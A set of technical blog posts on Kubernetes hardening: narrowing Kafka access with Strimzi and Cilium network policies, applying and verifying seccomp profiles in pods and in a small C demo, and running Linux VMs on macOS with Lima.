{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages

Restricting Kafka Access with Strimzi Network Peers

So how can we make this a bit safer? The first improvement is to restrict which workloads can reach the Kafka listener at all.

Strimzi can generate a Kubernetes NetworkPolicy for Kafka listeners directly from the Kafka resource definition. Taking a look we can see what it created.

matt@ciliumcontrolplane:~/kafka$ kubectl get netpol -A
NAMESPACE       NAME                        POD-SELECTOR                                                               AGE
platform-data   demo-network-policy-kafka   strimzi.io/cluster=demo,strimzi.io/kind=Kafka,strimzi.io/name=demo-kafka   115m

Oddly enough we never did anything to create this. So what if we want to change this? You can do that through the networkPolicyPeers field on the listener configuration. Instead of leaving the listener open to the entire cluster, we can limit which namespaces or pods are allowed to connect to the broker port.

Below is a simplified example restricting access to the payments namespace.

listeners:
  - name: plain
    port: 9092
    type: internal
    tls: false
    networkPolicyPeers:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: payments

When this configuration is applied, Strimzi generates a Kubernetes NetworkPolicy that allows connections to the Kafka listener only from workloads in the payments namespace.

So once we've applied let's try one inside the namespace and one outside as before.

Works:

matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-worker -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages

Doesn't Work:

matt@ciliumcontrolplane:~/kafka$ kubectl -n analytics exec -it analytics-random -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
Processed a total of 0 messages

That is great, but it would probably be easier to manage it outside using your ordinary NetworkPolicy or CiliumNetworkPolicy. But how can we do that if we really have no choice in either a default NetworkPolicy or a custom NetworkPolicy being created.

Bring Your Own NetworkPolicy

Restricting the Kafka listener with Strimzi networkPolicyPeers works, but it also introduces another layer of policy management that may not always be desirable.

Instead, we can allow Strimzi to generate its listener policy while making it effectively match no real workloads. This keeps the listener closed by default and lets us explicitly manage access using our own network policies.

One simple way to do this is to configure the listener peers so they match a namespace that does not exist.

listeners:
  - name: plain
    port: 9092
    type: internal
    tls: false
    networkPolicyPeers:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: neverusedns

With this configuration, the Strimzi-generated NetworkPolicy no longer matches real client pods. The Kafka listener is effectively closed to normal workloads.

From there, we can explicitly allow the intended clients using a Cilium network policy.

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: kafka-worker-only
  namespace: platform-data
spec:
  endpointSelector:
    matchLabels:
      k8s:app.kubernetes.io/instance: demo
      k8s:io.kubernetes.pod.namespace: platform-data
  ingress:
    - fromEndpoints:
        - matchLabels:
            k8s:app: payments-worker
            k8s:io.kubernetes.pod.namespace: payments
      toPorts:
        - ports:
            - port: "9092"
              protocol: TCP

This policy selects the Kafka broker pods in the platform-data namespace and allows inbound traffic to port 9092 only from pods labeled app=payments-worker in the payments namespace.

Wrap Up

This exercise originally started while experimenting with a Kafka-aware Cilium feature that is now being deprecated. While that path turned out to be a dead end, it ended up being a useful way to explore how network policy actually behaves in a real Kubernetes use case.

What the experiment ultimately showed is that network policy is very good at shrinking the trust boundary, but it cannot eliminate trust entirely.

In our case we moved through three stages:

Default Kubernetes networking where any pod could reach Kafka
Restricting listener access with Strimzi networkPolicyPeers
Explicitly allowing only the required workload using a Cilium policy for ease of management

Each step reduced the blast radius. Instead of trusting the entire cluster, we narrowed the boundary to a specific application, and finally to a specific workload.

But some trust still remains. If both a producer and consumer legitimately need to reach Kafka, the network layer alone cannot perfectly distinguish their roles. At some point the system must trust that the service behaves the way the architecture intends.

Security controls rarely eliminate trust boundaries, but they do make them smaller and more explicit.

In this example, the goal was not to achieve perfect isolation. It was to turn a flat cluster network where any pod could read Kafka into a system where only the workloads that should talk to Kafka can reach it at all.

Seccomp in Kubernetes

Matt Brown — Mon, 16 Feb 2026 22:00:14 GMT

In Part 1, we stayed close to the kernel.

We watched a process call uname(), attach a seccomp filter, and then get shut down at the syscall boundary. No permissions debate. No LSM policy. No capability check. The kernel simply said: that syscall does not exist for you anymore.

Clean. Brutal.

But what about the Kubernetes part? You're probably already running seccomp.

Not because you enabled it. Not because you wrote a profile. And definitely not because you tuned it.

You're running it because your container runtime turned it on for you. When a container starts, the application doesn’t install a seccomp filter. The container runtime does. Docker, containerd, etc. attach a default profile before your code ever runs. Kubernetes doesn’t enforce syscalls. It simply tells the runtime which profile to use. The actual enforcement still happens at the same kernel boundary we saw in Part 1. And once seccomp moves from "toy C demo" to "running cluster," the questions change.

Not the stuff we know:

What is a syscall?
How does BPF work?

But:

What profile is actually active on my pods?
What does it allow?
And what happens if I turn it off?

That’s where we’re going.

Orientation Diagram

Keep this diagram in mind.

Everything in this post is about how a seccomp profile defined in a Pod spec ends up enforced inside the kernel. Kubernetes selects the profile. The container runtime attaches it. The kernel evaluates every syscall against it.

The enforcement point hasn’t moved. It’s still the syscall boundary we explored in Part 1. What’s changed is the plumbing that decides which filter gets there.

The Most Common Case: Nothing Configured

In many clusters, pods don’t specify a seccomp profile at all.

The pod spec is silent.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: no-seccomp
spec:
  replicas: 1
  selector:
    matchLabels:
      app: no-seccomp
  template:
    metadata:
      labels:
        app: no-seccomp
    spec:
      containers:
        - name: nginx
          image: nginx

It’s simply not present. So what happens? It will run completely unconfined. Create this deployment and check inside the container.

matt@cp:~/seccomp$ kubectl exec no-seccomp-75d54c6445-s7ln8 -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0

We can see Seccomp: 0, which of course means no seccomp.

A Simple Way to See Seccomp in Action

One syscall commonly blocked by the runtime’s default seccomp profile is keyctl.

keyctl interacts with the Linux kernel keyring subsystem. Most containers don’t need to manage kernel keyrings, so the default profile blocks it as unnecessary attack surface.

If you’re using the basic Nginx image, you can install a small test tool:

matt@cp:~$ kubectl exec -it no-seccomp-75d54c6445-s7ln8 -- /bin/bash
root@no-seccomp-75d54c6445-s7ln8:/# apt-get update && apt-get install -y keyutils

Then run:

root@no-seccomp-75d54c6445-s7ln8:/# keyctl show
Session Keyring
 857262715 --alswrv      0     0  keyring: ...

As we would expect.

Now why this example? The kernel keyring subsystem stores sensitive material such as session keys. Direct interaction with kernel-managed key storage is not something typical application containers need.

From an attacker’s perspective, however, kernel keyrings can become part of privesc and more.

Blocking keyctl removes that entire class of risk (sound familiar?). That’s the core idea behind seccomp: if the workload doesn’t need it, the syscall doesn’t exist.

RuntimeDefault: Making the Baseline Explicit

Instead of relying on cluster defaults (aka nothing), you can declare your intent directly. Let's give it a shot in a new deployment.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: yes-seccomp
spec:
  replicas: 1
  selector:
    matchLabels:
      app: yes-seccomp
  template:
    metadata:
      labels:
        app: yes-seccomp
    spec:
      containers:
        - name: nginx
          image: nginx
          imagePullPolicy: IfNotPresent
          securityContext:
            seccompProfile:
              type: RuntimeDefault

This tells Kubernetes to use the default seccomp profile provided by the container runtime. The runtime attaches that profile before the container process starts. The kernel enforces it on every syscall. Just a filter at the syscall boundary.

Let's run the same exercise as before.

matt@cp:~$ kubectl exec -it yes-seccomp-75d54c6445-s7ln8 -- /bin/bash
root@no-seccomp-75d54c6445-s7ln8:/# apt-get update && apt-get install -y keyutils

Then run:

root@no-seccomp-75d54c6445-s7ln8:/# keyctl show
Session Keyring
Unable to dump key: Operation not permitted

Voila, syscall filtering at is finest. But what exactly is that filter?

The Actual RuntimeDefault Profile

If you want to see what RuntimeDefault really means on your node (and why wouldn't you?), inspect the OCI runtime spec the container runtime handed to runc.

First, list running containers and grab a container ID:

matt@cp:~/seccomp$ sudo crictl ps | grep yes-seccomp
...
d7ebc42cadd5f       2af158aaca82b       14 minutes ago      Running             nginx                       0                   e3aa4f4782108       yes-seccomp-796856b464-hqq44               default

Now inspect the container and extract the exact seccomp configuration from the runtime spec:

matt@cp:~/seccomp$ sudo crictl inspect d7ebc42cadd5f | jq '.info.runtimeSpec.linux.seccomp'

If seccomp is enabled, you’ll see something like:

{
  "architectures": [
    "SCMP_ARCH_ARM",
    "SCMP_ARCH_AARCH64"
  ],
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {
      "action": "SCMP_ACT_ALLOW",
      "names": [
        "accept",
        "accept4",
...
          "op": "SCMP_CMP_MASKED_EQ",
          "value": 2114060288
        }
      ],
      "names": [
        "clone"
      ]
    },
    {
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 38,
      "names": [
        "clone3"
      ]
    }
  ]
}

This is the actual seccomp profile applied to the container. And it is easy to see what is explicitly allowed by looking at the names of syscalls under SCMP_ACT_ALLOW.

And if you actually want to see how many syscalls are allowed, it is easy to take a look.

matt@cp:~/seccomp$ sudo crictl inspect d7ebc42cadd5f | jq '
  .info.runtimeSpec.linux.seccomp.syscalls
  | map(.names) | add
  | unique
  | length
'
...
377

Unconfined and Privileged

RuntimeDefault is a baseline. But it’s not guaranteed. In Kubernetes, seccomp can be explicitly disabled:

securityContext:
  seccompProfile:
    type: Unconfined

That tells the runtime not to attach a seccomp filter at all. When that happens, the container process runs with full access to the kernel’s syscall surface (subject to capabilities and LSMs, but without syscall filtering).

Adjust the deployment with this new securityContext and you can verify it the same way as before:

matt@cp:~/seccomp$ kubectl exec unconfined-seccomp-6489c66986-vslvv -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0

There’s another common way seccomp effectively disappears: privileged containers. When a container runs privileged, it is granted elevated access to the host.

securityContext:
  privileged: true
  seccompProfile:
    type: RuntimeDefault

Adjust the deployment with this new securityContext and you can verify it the same way as before:

matt@cp:~/seccomp$ kubectl exec priv-seccomp-57778f5d79-zdm9x -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0

As you can see, privileged wiped out the intent of the seccompProfile. User beware.

Making Seccomp the Default (kubeadm)

Declaring RuntimeDefault in every pod spec works. But there's another way! You can read it in the CIS Kubernetes Benchmark under 4.2.14.

Modern Kubernetes supports making the runtime’s default seccomp profile the automatic baseline for all pods that don’t explicitly specify one. On kubeadm clusters, this is controlled by the kubelet.

You want:

seccompDefault: true

You can verify whether it’s enabled on a node:

kubectl proxy &
curl -s http://127.0.0.1:8001/api/v1/nodes//proxy/configz   | jq '.kubeletconfig.seccompDefault'

If it returns true, pods without an explicit seccompProfile will automatically run under the runtime’s default profile.

If it’s false, a pod that doesn’t declare seccomp may run completely unconfined.

To enable it in kubeadm, update your KubeletConfiguration, which should be in var/lib/kubelet/config.yaml. Simply add the default setting.

seccompDefault: true

Then apply the configuration and restart the kubelet. With seccompDefault: true, RuntimeDefault becomes the cluster-wide baseline instead of an opt-in setting. Not too bad.

Wrap Up

It’s tempting to treat RuntimeDefault as some kind of security panacea, but of course it isn't.

The runtime’s default seccomp profile is designed to be broadly compatible. It allows hundreds of syscalls because most applications need them.

What it blocks are the obvious outliers like kernel keyring manipulation (bet you didn't think I would go there). That’s valuable. It reduces attack surface. But it does not create tight isolation.

If your application only needs 80 syscalls, and the runtime allows 377, you’re still exposing far more kernel surface than strictly necessary.

RuntimeDefault is a baseline hygiene control.

It says:

“We’re not going to allow clearly dangerous or unnecessary syscalls.”

It does not say:

“This workload has a minimal, workload-specific syscall surface.”

For many teams, RuntimeDefault is the right tradeoff. It’s low friction, broadly safe, and rarely breaks applications. But it’s not a sandbox. It’s a compatibility-first safety net.

Seccomp: The Syscall Firewall

Matt Brown — Thu, 05 Feb 2026 08:06:51 GMT

Introduction

We’ve already covered two Linux security mechanisms that show up in Kubernetes securityContext:

Both matter. Both do real work. But there’s a third piece that’s just as important: seccomp.

If capabilities define what powers a process has, seccomp defines which syscalls it’s even allowed to attempt. It doesn’t care who you are or whether you’re root. It sits at the syscall boundary and says:

This syscall exists.
That one doesn’t.
Try anyway and the kernel shuts it down.

Seccomp isn’t a Kubernetes feature. It’s a Linux kernel mechanism that predates containers, evolving from a blunt “read/write/exit” sandbox into a BPF-powered filter that decides which syscalls are allowed to exist at all.

The pattern should feel familiar:

Root used to mean “try anything”
Capabilities split that power into smaller pieces

Seccomp applies the same idea to syscalls:

Old world: call whatever you want and see what happens
Seccomp: the kernel stops you before anything happens

That distinction matters. Capabilities decide whether a syscall succeeds. LSMs decide whether a resource is accessible. Seccomp decides whether the syscall ever runs. Same kernel, different choke points.

This post stays focused on seccomp as a Linux primitive. This means where it comes from, how syscall filtering actually works, and what it means to block a syscall at the kernel boundary. We'll get to YAML and "hardening checklists" later.

Orientation Diagram: Where Seccomp Intercepts Syscalls

Keep this diagram in mind. Everything in this post is about what happens at the syscall boundary. This is before permissions, before resources, and before the kernel ever executes a syscall. This is about where seccomp lives in Linux.

Where Seccomp Runs in the Kernel

Seccomp doesn’t live inside a syscall implementation, and it doesn’t care what the syscall is trying to do. Once enabled, the kernel evaluates seccomp before it dispatches the syscall to its real handler. If the filter says no, the syscall never executes.

That ordering is a key detail. When a process makes a syscall, the kernel first checks whether seccomp is active for that process. If it is, the kernel runs the attached BPF filter and asks a single question: Is this syscall allowed to exist for this process?

Only an explicit allow causes the kernel to continue. Otherwise, the kernel returns an error, sends a signal, or kills the process, never reaching the syscall’s implementation. From the kernel’s perspective, a blocked syscall is indistinguishable from one that was never there.

Why Seccomp Is a Different Control Layer

This is also why seccomp doesn’t overlap cleanly with capabilities or LSMs.

Capabilities and LSMs operate after the syscall has already been selected:

Capabilities decide whether a syscall is allowed to perform privileged actions
LSMs decide whether access to a specific object (file, socket, mount) is permitted

Seccomp runs earlier than both. It doesn’t reason about permissions or resources. It only answers whether a syscall is permitted to run at all. That makes seccomp the earliest enforcement point. It is a hard gate in front of the syscall table itself.

The One-Way Property

Once a process enters a seccomp mode, it cannot leave it.

The kernel enforces seccomp as a one-way transition: unrestricted to restricted, never the reverse. The active seccomp state is stored directly on the process and inherited across forks and execs. There is no API to remove or weaken a filter once it’s in place. Seccomp is designed so a process can only reduce its own attack surface, never expand it later.

This raises two obvious questions: Who enables seccomp in the first place and when does that happen?

How Seccomp Gets Enabled

Seccomp doesn’t apply itself automatically, and it isn’t something the kernel turns on by default. A process only enters a secure computing state when something explicitly asks the kernel to enable it.

That "something" is usually:

the process itself
or a parent process acting as a supervisor (systemd, a container runtime, a sandbox)

At the kernel level, this happens through two syscalls:

prctl()
seccomp()

Both tell the kernel to place the current process into a seccomp mode.

Seccomp Is Enabled Per Process

Seccomp is a per-process setting. When it’s enabled, the kernel records that state directly on the process:

task_struct.seccomp.mode
task_struct.seccomp.filter

From that point on:

every syscall made by the process is subject to seccomp checks
all threads in the process share the same seccomp state
child processes created via fork() inherit it
execve() does not reset it

This transition is one-way: unrestricted → restricted. There is no mechanism to remove or weaken a filter once it’s active.

What `prctl()` Is

prctl() isn’t part of the normal syscall execution path. It’s a configuration syscall used to change process behavior.

When a program calls:

prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filter);

it isn’t routing syscalls through prctl(). It’s making a one-time request: Attach this seccomp filter to the current process. After that, prctl() is out of the picture. All future syscalls follow the normal entry path. They just get evaluated by seccomp first.

Who Enables Seccomp in Practice

Most applications don’t enable seccomp themselves. Instead, it’s usually done by whatever launches the process:

systemd
container runtimes
application sandboxes

The pattern is consistent:

The parent process loads a seccomp filter
It enables seccomp on the child before exec
The application starts already inside a secure computing state

By the time application code runs, seccomp is already enforced.

Where We Are So Far

So far, we’ve stayed intentionally close to the kernel.

We’ve looked at where seccomp runs in the syscall path, how it gets enabled, and how a syscall can be blocked before the kernel ever executes it. That’s the core idea: seccomp reduces attack surface by deciding which syscalls are allowed to exist for a process.

At this point, we’ve talked about seccomp in the abstract. The next step is to make that concrete. But, before we look at a real example, we need to clarify one last piece of terminology: what a “seccomp profile” actually is under the hood.

What a Seccomp “Profile” Actually Is

A seccomp profile is not a policy language, nor a permissions model, and definitely not a Kubernetes abstraction.

At the kernel level, a seccomp profile is simply this:

A BPF program attached to a process that evaluates every syscall before it runs. Check out more on BPF here.

Everything else is packaging.

Profiles Are Filters, Not Rules

When seccomp runs in filter mode, the kernel executes a BPF program on every syscall. That program receives a small amount of context (the syscall number, its arguments, and the architecture). Then it gives a verdict.

That verdict isn’t abstract. It’s one of a small set of concrete actions:

allow the syscall to proceed
return an error (for example, EPERM)
send a signal
or terminate the process

There’s no concept of users, roles, or resources here. The filter doesn’t know why a syscall is happening, only which syscall it is.

Default-Deny Is the Point

Real seccomp profiles often start from a default action like:

DENY

and then explicitly allow only the syscalls the process needs. This isn’t about detecting bad behavior. It’s about reducing attack surface. From the kernel’s perspective, allowed syscalls exist; everything else does not.

Capabilities and LSMs can only restrict what a syscall is allowed to do. Seccomp can prevent the syscall from running at all.

Tooling Is Just a Compiler

Most people never write BPF by hand. Instead, they interact with seccomp through tools and profile formats:

libseccomp
runtime-provided defaults
human-readable profile files

All of these do the same thing:

Take a list of allowed syscalls
Compile it into a BPF program
Attach that program to the process

Once the filter is loaded, the kernel doesn’t care how it was generated. At runtime, we get a BPF program and a verdict.

Let's go full burrito and see how it actually works.

A Concrete Example: What Seccomp Actually Does

Let's walk through a tiny program that installs a seccomp filter at runtime and then makes a few syscalls before and after that filter is in place. The goal isn’t to write production-grade seccomp policy. We just want to make the enforcement behavior obvious.

What We’re Trying to Show

This program is intentionally simple, and it runs in a very specific order:

It makes a few normal syscalls (getpid(), uname()) before any filtering is applied
It installs a seccomp filter-mode profile at runtime
It repeats those same syscalls after the filter is active
One syscall still succeeds because it’s explicitly allowed
One syscall fails because seccomp blocks it at the syscall boundary

That before-and-after contrast lets us see seccomp doing exactly what it’s designed to do: stop a syscall before the kernel ever executes it.

To make the behavior obvious, the filter allows only a small set of syscalls:

getpid()
read, write, exit, exit_group

Everything else is implicitly denied, including:

uname()

Any syscall that isn’t explicitly allowed will fail with EPERM.

The Demo Program

// seccomp_demo.c
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 

static void die(const char *msg) {
    perror(msg);
    exit(EXIT_FAILURE);
}

static void print_uname(const char *label) {
    struct utsname u;
    int rc = uname(&u);
    if (rc == -1) {
        printf("%s: uname() failed: errno=%d (%s)\n",
               label, errno, strerror(errno));
    } else {
        printf("%s: uname() ok: sysname=%s, release=%s\n",
               label, u.sysname, u.release);
    }
}

static void install_seccomp_filter(void) {
    int rc;
    scmp_filter_ctx ctx;

    ctx = seccomp_init(SCMP_ACT_ERRNO(EPERM));
    if (ctx == NULL) {
        die("seccomp_init");
    }

    rc  = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0);

    if (rc < 0) {
        seccomp_release(ctx);
        die("seccomp_rule_add");
    }

    rc = seccomp_load(ctx);
    if (rc < 0) {
        seccomp_release(ctx);
        die("seccomp_load");
    }

    seccomp_release(ctx);
}

int main(void) {
    printf("== Before seccomp ==\n");

    pid_t pid = getpid();
    printf("before: getpid() = %d\n", pid);

    print_uname("before");

    printf("\nInstalling seccomp filter (default DENY, allow read/write/exit/getpid)...\n\n");
    install_seccomp_filter();

    printf("== After seccomp ==\n");

    pid = getpid();
    printf("after: getpid() = %d (still works)\n", pid);

    print_uname("after");

    printf("\nDone.\n");
    return 0;
}

Prereqs

Ensure you have seccomp.

matt@cp:~/seccomp$ sudo apt update
sudo apt install -y libseccomp-dev

Compile and Run

matt@cp:~/seccomp$ ./seccomp_demo
== Before seccomp ==
before: getpid() = 10746
before: uname() ok: sysname=Linux, release=6.8.0-90-generic

Installing seccomp filter (default DENY, allow read/write/exit/getpid)...

== After seccomp ==
after: getpid() = 10746 (still works)
after: uname() failed: errno=1 (Operation not permitted)

Done.

At this point, we’ve seen seccomp in action!

What Actually Happened

Before seccomp was enabled, the program’s syscalls followed the normal execution path. Calls like getpid() and uname() entered the kernel, were dispatched to their respective implementations, and returned results as expected. When the seccomp filter was installed, the kernel attached a BPF program to the process and marked it as running in seccomp filter mode. From that point on, every syscall issued by the process was evaluated against that filter before the kernel considered executing it.

After seccomp was active, getpid() continued to work because it matched an explicit allow rule. The call to uname(), however, did not. The seccomp filter returned a denial verdict, and the kernel immediately enforced it by returning an error to userspace. The sys_uname() implementation was never reached.

Nothing else happened behind the scenes. There was no permission check, no resource evaluation, and no fallback logic. The syscall was intercepted, a verdict was returned, and the kernel enforced it.

That is seccomp doing exactly what it is designed to do.

Wrap Up

The demo showed seccomp doing one thing, very reliably: preventing a syscall from ever reaching the kernel implementation. Once a filter returns a verdict, the kernel enforces it and moves on. That enforcement point is what makes seccomp different from the other kernel controls we’ve looked at. Capabilities constrain what a syscall can do. LSMs constrain what a syscall can touch. Seccomp runs earlier than both and reduces attack surface by deciding which syscalls are allowed to exist in the first place.

This is why seccomp works best as a complement, not a replacement. It doesn’t understand intent, resources, or permissions, but it doesn’t need to. Its job is to shrink the set of possible behaviors before any of those questions even come up.

This post stayed intentionally close to the kernel. Before seccomp appears as a profile, a default, or a field in configuration, it’s a Linux mechanism with specific behavior and tradeoffs. Understanding that behavior is what makes higher-level abstractions predictable instead of mysterious.

In the next post, we’ll move up a layer and look at how container runtimes and Kubernetes wire this kernel primitive into pods. And we'll see why defaults like RuntimeDefault matter more than they first appear.

Lima: Linux on macOS Without the Ceremony

Matt Brown — Thu, 29 Jan 2026 00:41:53 GMT

Introduction

Start with Linux. On macOS, if you want to do real container or Kubernetes work, the first decision isn’t Kubernetes at all, but rather how you’re going to run Linux. So far, my default approach has been a full Linux VM via UTM, with the OS depending on the goal: Ubuntu for familiarity, Talos for opinionated immutability, or something else when I want to experiment.

Kubernetes is a separate decision that comes after that. Once you have Linux, you choose how you want Kubernetes to show up:

kubeadm when you want to understand how clusters are actually built
Talos when you want a tightly controlled, production-shaped system
Minikube when you want something running quickly and don’t care much about what it’s doing under the hood

Linux VM first, Kubernetes second is honest, flexible, and how real clusters cam come into existence. It’s also a lot of setup if all you want is a disposable sandbox.

This is where Lima changes the flow. Lima collapses those steps. It gives you an easy, disposable Linux VM. And if you want a lightweight Kubernetes setup it is a great choice. Under the hood, it’s still VMs and still real Linux, but it’s optimized for iteration, not realism. That makes it an excellent starting point if you’re new, and a useful shortcut even if you’re already comfortable with kubeadm or Talos.

It’s not a replacement for a “real” cluster, but it is a faster way to get up and running.

If you take away one thing from this, it's stop running Minikube on your Mac.

Orientation Diagram: Where Lima Fits

Keep this diagram in mind. Everything in this post is about how quickly Lima gets you to a real Linux environment. It's not about changing how Linux or Kubernetes actually work.

What Lima Is

Lima is a developer-focused way to run Linux virtual machines on macOS. At its core, Lima does one thing well: it makes running Linux easy.

It orchestrates Linux VMs using QEMU on the host and handles the glue that makes those VMs usable for day-to-day work. This includes lifecycle management, networking, filesystem mounts, and access. You describe the VM you want, Lima starts it, and you interact with it directly.

Practically, that means:

A real Linux instance running in a VM
SSH access by default
Port forwarding so services inside the VM are reachable from macOS
Filesystem mounts so the VM feels a bit more local

There’s no GUI. Lima is designed to stay out of your way once the VM is running, just as we like.

At this point, it should be painfully obvious that Lima is a dead-simple way to get a lab running or do local testing without ceremony.

On macOS, Lima uses QEMU as the underlying VM engine. I’m intentionally not going deep on QEMU here, which applies equally to UTM. This will get its own post in the future.

Quick Linux Sanity Check: Run a Simple HTTP Server

Before doing anything more interesting, let’s get it running.

Install Lima

On your Mac it is a simple to install.

matt.brown@matt ~ % brew install lima
✔︎ JSON API cask.jws.json                                                                                                                  Downloaded   15.3MB/ 15.3MB
✔︎ JSON API formula.jws.json                                                                                                               Downloaded   32.0MB/ 32.0MB
==> Fetching downloads for: lima
✔︎ Bottle Manifest lima (2.0.3)                                                                                                            Downloaded   41.6KB/ 41.6KB
✔︎ Bottle lima (2.0.3)                                                                                                                     Downloaded   37.8MB/ 37.8MB
==> Pouring lima--2.0.3.arm64_tahoe.bottle.1.tar.gz
...
==> Summary
🍺  /opt/homebrew/Cellar/lima/2.0.3: 117 files, 77.6MB

Start a VM and Get a Shell

Run a Lima VM.

matt.brown@matt ~ % limactl start
? Creating an instance "default" Proceed with the current configuration
...
INFO[0010] [hostagent] [VZ] - vm state change: running
INFO[0019] [hostagent] Started vsock forwarder: 127.0.0.1:63216 -> vsock:22 on VM
INFO[0019] [hostagent] Detected SSH server is listening on the vsock port; changed 127.0.0.1:63216 to proxy for the vsock port
INFO[0020] SSH Local Port: 63216
...
INFO[0042] [hostagent] Forwarding TCP from 127.0.0.1:36217 to 127.0.0.1:36217
INFO[0053] [hostagent] The final requirement 1 of 1 is satisfied
INFO[0053] READY. Run `lima` to open the shell.

Cool, let's see what we've got.

matt.brown@matt ~ % limactl ls
NAME       STATUS     SSH                VMTYPE    ARCH       CPUS    MEMORY    DISK      DIR
default    Running    127.0.0.1:62655    vz        aarch64    4       4GiB      100GiB    ~/.lima/default

Actually nicely sized for K8s ootb.

Let's get a shell.

matt.brown@matt ~ % lima
lima@lima-default:/Users/matt.brown$ cd
lima@lima-default:~$

At this point, you’re inside the Linux VM. Not a container, just a VM.

Verify What You’re Running

A couple of quick checks should show we're in a Linux instance. They do Ubuntu ootb, totally likes us.

lima@lima-default:~$ uname -a
cat /etc/os-release
Linux lima-default 6.17.0-8-generic #8-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 20:54:15 UTC 2025 aarch64 GNU/Linux
PRETTY_NAME="Ubuntu 25.10"
NAME="Ubuntu"
VERSION_ID="25.10"
VERSION="25.10 (Questing Quokka)"
VERSION_CODENAME=questing
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=questing
LOGO=ubuntu-logo

Start a Simple HTTP Server

Ubuntu already has Python installed, so no setup required. Just create a directory with a simple html file.

lima@lima-default:~$ mkdir -p /tmp/web
echo "Hello from Lima" > /tmp/web/index.html
python3 -m http.server 8000 --directory /tmp/web
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

That’s a real process listening on a real Linux network interface inside the VM.

Access It from macOS

From your Mac, open a browser and hit:

http://localhost:8000

You should get a directory listing from Hello from Lima.

What Just Happened

The HTTP server is running inside the Linux VM
Lima forwarded the port to the host automatically
You didn’t install Docker or Kubernetes
You can see and control every layer involved

And as an F1 great would say, simply lovely.

A Single Container (Just to Prove the Point)

Before touching Kubernetes, it’s worth showing the smallest possible container example. This is still just Linux, running a container directly inside the VM.

The default Lima VM comes with containerd and nerdctl, so there’s nothing extra to install.

Use lima and nerdctl to fire up a container.

matt.brown@matt ~ % lima nerdctl run -d --name nginx -p 8080:80 nginx:alpine
docker.io/library/nginx:alpine:                                                   resolved       |++++++++++++++++++++++++++++++++++++++|
index-sha256:b0f7830b6bfaa1258f45d94c240ab668ced1b3651c8a222aefe6683447c7bf55:    done           |++++++++++++++++++++++++++++++++++++++|
manifest-sha256:969208a59fcbe5ed11f50a57fa6a0a023aa6311702f5fc252ac502a8a4d25c8a: done           |++++++++++++++++++++++++++++++++++++++|
config-sha256:a6e56e8d6213d3aa3046e4a1cb49d6ed133a1afc9178d8c17cbec445e330537a:   done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:8a735f2296d46b598dbc65289bfdc2ec4dd07607e69a1887e4ce6ef898be56e1:    done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:c0de4eea5b769c1703c4428a21cf0cce5b0a1668738391f1443979bb32cc9bc1:    done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:6628835d87d286d4d03f10b2c7f51d00f4556c49b5874947ce02609379069575:    done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:ceb87b8ac279a84fc99bdc30e7406cf21bf5d5841819fd0e3c8e0c06d867533c:    done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:f6b4fb9446345fcad2db26eac181fef6c0a919c8a4fcccd3bea5deb7f6dff67e:    done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:f4f04eae8d5eb8a0220a0d542da10f9c55b57a585dea1875cfbb1ee99d4c5a4a:    done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:a0ef6d8231d0e512c7a0c0f7029bcfb8c77f0848b9cb8ec5373b28991c83415b:    done           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:9076aaa4fd77085ce5562e9aca2b51ca88baf3fb8e41f8c777d0df14a1ce1085:    done           |++++++++++++++++++++++++++++++++++++++|
elapsed: 4.2 s                                                                    total:  24.6 M (5.8 MiB/s)
d3d4038f5cb71c934703f165b636b5a66d9fa61892ee79f1fc37097d7a4ea4ff

From your Mac, open a browser and hit:

http://localhost:8080

That’s it.

The container is running inside the Linux VM
The port is forwarded back to macOS
No Docker involved!

At this point, we have Linux and a container runtime with full visibility into what’s actually running.

Kubernetes with Lima

